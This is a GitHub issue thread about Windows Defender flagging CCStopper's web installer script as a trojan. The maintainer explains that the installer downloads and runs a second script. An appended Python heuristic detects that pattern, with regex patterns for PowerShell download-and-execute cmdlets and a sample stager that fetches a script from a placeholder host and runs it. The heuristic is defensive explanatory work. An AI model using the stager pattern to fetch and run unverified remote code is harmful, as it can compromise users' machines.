t4rra / CCStopper

[Archived] Stops Adobe's pesky background apps and more 😉
GNU General Public License v3.0
1.06k stars 65 forks

[Bug]: Windows Defender yells virus! Depending... #88

Closed colvdv closed 1 year ago

colvdv commented 1 year ago

What happened?

If I download CCStopper-main.zip from the main page (Code -> Download ZIP), Windows Defender goes off and deletes the file before I can try to do anything with it, stating the following:

Detected: Trojan:Script/Wacatac.H!ml
containerfile: CCStopper-main.zip
file: CCStopper-main.zip->CCStopper-main/web/Installer.ps1
webfile: CCStopper-main.zip|about:internet|pid:16836,ProcessStart:133362552658945170

However, if I download CCStopper.zip v1.2.3-hotfix.1 (current latest) from the releases page, there aren't any issues whatsoever and the experience is smooth and pleasant.

Expected Result?

I would expect that the download from the main page would be the latest; maybe I'm just not familiar with how GitHub works.

Either way, I am not happy that there is a virus detected in the one file. The other one worked as expected with zero virus alerts... a much better experience.

Thank you to the devs for making such an awesome program! I don't mean to come across as negative in any way, just wanting to share my experience.

Version?

v1.2.3-hotfix.1

Windows Version?

Windows 10 22H2

Duplicate Issues

t4rra commented 1 year ago

Please don't use the Code -> Download ZIP option, as it downloads the whole repository, including unnecessary files like the .gitignore, which is only necessary for development, and the /web/ folder, which is accessed when you run the one-line commands. The contents inside /src/ are zipped and uploaded onto the releases page, and I recommend that.

As for the virus detection, it's because of how the scripts in /web/ behave. The Installer.ps1 script essentially just downloads another script and runs it with some arguments. It's quite similar to how a trojan would behave by having a user download a script that looks trustworthy, then having that script download another script and running it.
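The download-then-run shape described in the comment above, as an added example that is not part of the thread or of CCStopper's code: a simplified static triage heuristic in Python, run over constructed PowerShell samples. The patterns, verdict labels and sample scripts are assumptions for illustration; they do not reproduce Windows Defender's ML detection or the project's Installer.ps1.

```python
import re

# Simplified static triage heuristic (assumption: illustrative only; this is
# not how Windows Defender's ML detection is implemented).
DOWNLOAD = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer)\b"
    r"|\.Download(String|File|Data)\s*\(",
    re.IGNORECASE,
)
EXECUTE = re.compile(
    r"\b(Invoke-Expression|iex|Start-Process)\b"
    r"|\[scriptblock\]::Create"
    r"""|^\s*[&.]\s+["'$(]""",  # call operator or dot-sourcing of a path
    re.IGNORECASE | re.MULTILINE,
)
VERIFY = re.compile(r"\b(Get-FileHash|Get-AuthenticodeSignature)\b", re.IGNORECASE)


def strip_comments(script: str) -> str:
    """Drop <# ... #> blocks and # line comments so prose cannot match."""
    script = re.sub(r"<#.*?#>", "", script, flags=re.DOTALL)
    return re.sub(r"(?m)(^|\s)#.*$", r"\1", script)


def classify(script: str) -> str:
    code = strip_comments(script)
    downloads = bool(DOWNLOAD.search(code))
    executes = bool(EXECUTE.search(code))
    if downloads and executes:
        # A hash/signature cmdlet being present is only a hint; it does not
        # prove that the check actually gates execution.
        return "download-and-execute+verify" if VERIFY.search(code) else "download-and-execute"
    return "download-only" if downloads else "execute-only" if executes else "no-match"


# Constructed samples (not the project's Installer.ps1).
STAGER = '''$url = "https://example.invalid/next.ps1"
$dest = Join-Path $env:TEMP "next.ps1"
Invoke-WebRequest -Uri $url -OutFile $dest
& $dest -Mode Install
'''
VERIFIED = STAGER.replace(
    "& $dest",
    'if ((Get-FileHash $dest -Algorithm SHA256).Hash -ne $expected) { throw "bad hash" }\n& $dest',
)
LOCAL_ONLY = "# irm | iex appears only in this comment\nStop-Service -Name 'ExampleSvc'\n"

if __name__ == "__main__":
    for name in ("STAGER", "VERIFIED", "LOCAL_ONLY"):
        print(name, "->", classify(globals()[name]))
```

A script that lands in the plain `download-and-execute` bucket has the same shape a stager has, which is why a legitimate installer written this way can still draw a detection.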